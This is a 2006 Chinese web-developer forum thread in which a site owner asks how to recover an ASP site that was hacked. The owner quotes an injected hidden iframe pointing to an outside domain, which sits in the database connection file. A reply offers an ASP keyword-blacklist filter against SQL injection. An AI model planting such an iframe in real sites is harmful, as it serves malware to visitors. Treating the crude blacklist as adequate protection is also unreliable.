网站被攻击了,应该怎么办?

zpyzhupai 2006-12-03 05:32:40
请大家看看这个网站http://scstc.cn是受到什么攻击了,应该怎么解决?请高手帮帮忙,谢谢!
...全文
489 20 打赏 收藏 转发到动态 举报
写回复
用AI写文章
20 条回复
切换为时间正序
请发表友善的回复…
发表回复
zpyzhupai 2006-12-20
  • 打赏
  • 举报
回复
谢谢各位哈!
什么都不能 2006-12-20
  • 打赏
  • 举报
回复
站点是否有图片上传之类的功能,最好不要使用此类上传
什么都不能 2006-12-20
  • 打赏
  • 举报
回复
<%
dim sql_injdata
SQL_injdata="'|and|exec|insert|select|delete|update|count|*|%|chr|mid|master|truncate|char|declare
SQL_inj=split(SQL_Injdata,"|")
If Request.QueryString<>"" Then
For Each SQL_Get In Request.QueryString
For SQL_Data=0 To Ubound(SQL_inj)
if instr(Request.QueryString(SQL_Get),Sql_Inj(Sql_DATA))>0 Then
Response.Write"<Script Language=javascript> alert('系统提示:\n请不要在参数中包含非法字符尝试注入!');history.back(-1)</Script>"
Response.end
end if
next
Next
End If
If Request.Form<>"" Then
For Each Sql_Post In Request.Form
For SQL_Data=0 To Ubound(SQL_inj)
if instr(Request.Form(Sql_Post),Sql_Inj(Sql_DATA))>0 Then
Response.Write"<Script Language=""javascript"">alert('系统提示:\n请不要在参数中包含非法字符尝试注入!\n');history.back()</Script>"
Response.end
end if
next
next
end if
%>
将以上代码放入inc/conn.asp文件中
pingaigh 2006-12-09
  • 打赏
  • 举报
回复
恩.看你急得..是我干的..^=^ 下次不敢了.
zpyzhupai 2006-12-09
  • 打赏
  • 举报
回复
发现了iframe src=http://bluewell.com.cn/ads/ width=0 height=0 frameborder=0></iframe>
这个代码写到了连接数据库的文件中,导致很多页面都出现这个问题
请问怎样检查这个漏洞,怎样防范再受到攻击?
cfstudio 2006-12-09
  • 打赏
  • 举报
回复
发现了就删除掉啊。

我打开首页时,检测到两个站外的非法连接~
cfstudio 2006-12-09
  • 打赏
  • 举报
回复
留意:
http://bluewell.com.cn/ads.....

还有:

http://wshadow.com/hei/.....

自己在源码里面查找下吧。

用DW,使用搜索文件夹功能,把所有的网页源码都搜索看看。

关键字就用上面的吧。

如果没有的话,像楼上说的,留意下框架或者js文件。可能是广告木马。


在本地也杀下毒吧。
zpyzhupai 2006-12-09
  • 打赏
  • 举报
回复
在有的页面发现了如下代码<iframe src=http://bluewell.com.cn/ads/ width=0 height=0 frameborder=0></iframe>这是被人家添加的,怎么搞定?谢谢!
anwell 2006-12-09
  • 打赏
  • 举报
回复
有的虚拟主机提供商安全方面也设置的不好,被跨站注入了.
anwell 2006-12-09
  • 打赏
  • 举报
回复
呵呵
什么都不能 2006-12-09
  • 打赏
  • 举报
回复
我不懂,建议先去买几本书学习下。然后再去找极品高手去请教。
xiemate 2006-12-09
  • 打赏
  • 举报
回复
查看所有与首页相联的文件.看里面是滞有框架..或可疑代理连接到别的网站上
pxiaoli 2006-12-09
  • 打赏
  • 举报
回复
自卫反击敌胆汗
zpyzhupai 2006-12-09
  • 打赏
  • 举报
回复
自己顶一下,希望高手指点!
cink 2006-12-04
  • 打赏
  • 举报
回复
被人家放了 网页木马 估计是程序BUG 请先去处代码
加QQ147031
lymyx 2006-12-04
  • 打赏
  • 举报
回复
有漏洞,程序本身存在错误,上传等、。
zpyzhupai 2006-12-04
  • 打赏
  • 举报
回复
谢谢各位的指点哈,不过我还是不明白怎么去处理这个问题,空间是买的,网站是通过ftp工具上传上去的,能否详细说明怎样去处理呢?
hbjmdx008 2006-12-03
  • 打赏
  • 举报
回复
Trojan.DL.VBS.Agent.cfw

杀毒。
Atai-Lu 2006-12-03
  • 打赏
  • 举报
回复
解决的方式通常只有一种,就是检查漏洞,程序的,服务器的,看看是哪个漏洞被别人利用了,然后修补上.
zpyzhupai 2006-12-03
  • 打赏
  • 举报
回复
急,请高手帮忙哈,空间是租用的

28,391

社区成员

发帖
与我相关
我的任务
社区描述
ASP即Active Server Pages,是Microsoft公司开发的服务器端脚本环境。
社区管理员
  • ASP
  • 无·法
加入社区
  • 近7日
  • 近30日
  • 至今
社区公告
暂无公告

试试用AI创作助手写篇文章吧